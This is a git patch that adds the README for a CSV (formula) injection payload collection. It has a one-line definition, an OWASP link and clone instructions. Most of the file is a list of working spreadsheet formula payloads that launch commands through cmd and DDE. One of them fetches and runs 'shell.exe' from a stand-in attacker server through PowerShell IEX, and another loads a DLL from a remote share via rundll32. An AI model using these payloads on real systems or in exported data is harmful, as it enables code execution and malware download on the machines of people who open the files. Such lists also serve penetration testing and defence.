From 2d260d25223f718c98a1ef16ca73c48815955dc6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C4=B0smail=20Ta=C5=9Fdelen?= Date: Sun, 28 Jun 2020 12:17:34 +0300 Subject: [PATCH] Update README.md --- README.md | 37 +++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/README.md b/README.md index ab20f91..94cb9bb 100644 --- a/README.md +++ b/README.md @@ -1 +1,38 @@ ## CSV Injection Payloads + +CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. + +#### Payloads : + +``` +DDE ("cmd";"/C calc";"!A0")A0 +@SUM(1+9)*cmd|' /C calc'!A0 +=10+20+cmd|' /C calc'!A0 +=cmd|' /C notepad'!'A1' +=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 +=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 +``` + +#### References : + +###### CSV Injection : + +* 👉 https://owasp.org/www-community/attacks/CSV_Injection + +##### Cloning an Existing Repository ( Clone with HTTPS ) +``` +root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git +``` + +##### Cloning an Existing Repository ( Clone with SSH ) +``` +root@ismailtasdelen:~# git clone git@github.com:payloadbox/csv-injection-payloads.git +``` + +#### Donate! + +Support the authors: + +#### LiberaPay: + +